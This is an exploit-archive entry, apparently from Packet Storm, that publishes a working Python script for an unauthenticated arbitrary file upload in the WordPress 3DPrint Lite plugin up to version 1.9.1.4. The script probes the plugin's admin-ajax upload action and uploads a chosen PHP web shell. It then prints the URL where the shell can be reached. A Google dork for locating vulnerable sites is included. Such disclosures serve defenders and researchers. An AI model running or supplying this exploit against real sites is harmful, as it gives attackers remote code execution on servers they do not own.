WordPress 3DPrint Lite 1.9.1.4 Shell Upload

WordPress 3DPrint Lite plugin version 1.9.1.4 suffers from a remote shell upload vulnerability.

MD5 | df05024a490ce087dd2a9ea5257bf09c

Download

# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
  print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
  print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
  print("Usage: python3 exploit.py [target url] [php file]")
  print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
  response = requests.get(uri)
  raw = response.text
  if ("jsonrpc" in raw):
    return True;
  else:
    return False;

def main():

  print_banner()
  if(len(sys.argv) != 3):
    print_usage();
    sys.exit(1);

  base = sys.argv[1]
  file_path = sys.argv[2]

  ajax_action = 'p3dlite_handle_upload'
  admin = '/wp-admin/admin-ajax.php';

  uri = base + admin + '?action=' + ajax_action ;
  check = vuln_check(uri);

  if(check == False):
    print("(*) Target not vulnerable!");
    sys.exit(1)

  if( path.isfile(file_path) == False):
    print("(*) Invalid file!")
    sys.exit(1)

  files = {'file' : open(file_path)}
  print("Uploading Shell...");
  response = requests.post(uri, files=files)
  file_name = path.basename(file_path)
  if(file_name in response.text):
    print("Shell Uploaded!")
    if(base[-1] != '/'):
      base += '/'
    print(base + "wp-content/uploads/p3d/" + file_name);
  else:
    print("Shell Upload Failed")
    sys.exit(1)

main();
            

Source: packetstormsecurity.com